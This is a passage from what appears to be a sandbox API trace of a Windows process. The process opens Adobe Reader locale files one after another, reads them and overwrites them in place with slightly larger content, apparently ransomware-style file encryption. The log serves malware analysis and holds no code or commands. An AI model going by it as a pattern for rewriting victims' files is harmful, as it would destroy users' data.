returned 0x2800 [0079.150] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.150] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0079.150] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.150] CloseHandle (hObject=0x1e8) returned 1 [0079.151] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\accessibility.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\accessibility.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.151] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.151] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x7e00 [0079.152] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.152] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.152] ReleaseMutex (hMutex=0x168) returned 1 [0079.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.KOR", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.KOR", cchWideChar=17, lpMultiByteStr=0x1f88ba4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.KOR", lpUsedDefaultChar=0x0) returned 17 [0079.152] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.181] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x6e00 [0079.181] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.214] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x6e00 [0079.214] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.233] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0079.233] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.233] CloseHandle (hObject=0x1e8) returned 1 [0079.234] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\eBook.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\ebook.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.234] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.234] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1800 [0079.235] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.235] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.235] ReleaseMutex (hMutex=0x168) returned 1 [0079.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.KOR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0079.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.KOR", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.KOR", lpUsedDefaultChar=0x0) returned 9 [0079.235] ReadFile (in: hFile=0x1e8, lpBuffer=0x2669698, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesRead=0x2e9f2bc*=0x1800, lpOverlapped=0x0) returned 1 [0079.265] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0079.266] WriteFile (in: hFile=0x1e8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1d88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1d88, lpOverlapped=0x0) returned 1 [0079.266] CloseHandle (hObject=0x1e8) returned 1 [0079.266] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\ReadOutLoud.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\readoutloud.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.267] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.267] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2400 [0079.267] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.267] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.267] ReleaseMutex (hMutex=0x168) returned 1 [0079.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.KOR", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.KOR", cchWideChar=15, lpMultiByteStr=0x1f7342c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.KOR", lpUsedDefaultChar=0x0) returned 15 [0079.267] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.272] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1400 [0079.272] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.273] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1400 [0079.273] WriteFile (in: hFile=0x1e8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.273] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0079.273] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e955a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.274] CloseHandle (hObject=0x1e8) returned 1 [0079.274] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\updater.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\updater.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.274] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.275] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2000 [0079.275] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.275] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.275] ReleaseMutex (hMutex=0x168) returned 1 [0079.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.KOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0079.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.KOR", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.KOR", lpUsedDefaultChar=0x0) returned 11 [0079.275] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0079.281] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0079.282] WriteFile (in: hFile=0x1e8, lpBuffer=0x2695c18*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695c18*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0079.282] CloseHandle (hObject=0x1e8) returned 1 [0079.283] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\DigSig.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\digsig.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.283] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.284] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1e800 [0079.284] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.284] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.284] ReleaseMutex (hMutex=0x168) returned 1 [0079.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.NOR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0079.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.NOR", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.NOR", lpUsedDefaultChar=0x0) returned 10 [0079.284] ReadFile (in: hFile=0x1e8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.289] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1d800 [0079.290] ReadFile (in: hFile=0x1e8, lpBuffer=0x2669698, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.311] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1d800 [0079.311] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.312] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0079.312] WriteFile (in: hFile=0x1e8, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.312] CloseHandle (hObject=0x1e8) returned 1 [0079.313] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\PPKLITE.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\ppklite.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.313] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.314] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x7c000 [0079.314] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.314] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.314] ReleaseMutex (hMutex=0x168) returned 1 [0079.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.NOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0079.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.NOR", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.NOR", lpUsedDefaultChar=0x0) returned 11 [0079.315] ReadFile (in: hFile=0x1e8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0079.368] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7b000 [0079.369] ReadFile (in: hFile=0x1e8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.396] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7b000 [0079.397] WriteFile (in: hFile=0x1e8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.397] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0079.397] WriteFile (in: hFile=0x1e8, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0079.398] CloseHandle (hObject=0x1e8) returned 1 [0079.398] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.399] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.399] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe1 [0079.399] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.399] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.400] ReleaseMutex (hMutex=0x168) returned 1 [0079.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0079.400] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ee71c8, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee71c8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe1, lpOverlapped=0x0) returned 1 [0079.401] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0079.402] WriteFile (in: hFile=0x1e8, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x669, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2e9f2d0*=0x669, lpOverlapped=0x0) returned 1 [0079.402] CloseHandle (hObject=0x1e8) returned 1 [0079.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\BRdlang32.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\brdlang32.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.403] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.403] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3800 [0079.404] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.404] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.404] ReleaseMutex (hMutex=0x168) returned 1 [0079.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.NLD", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.NLD", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.NLD", lpUsedDefaultChar=0x0) returned 13 [0079.404] ReadFile (in: hFile=0x1e8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.407] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2800 [0079.407] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e965d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e965d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.410] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2800 [0079.411] WriteFile (in: hFile=0x1e8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.411] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0079.411] WriteFile (in: hFile=0x1e8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.411] CloseHandle (hObject=0x1e8) returned 1 [0079.412] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Multimedia.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\multimedia.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.412] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.412] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, 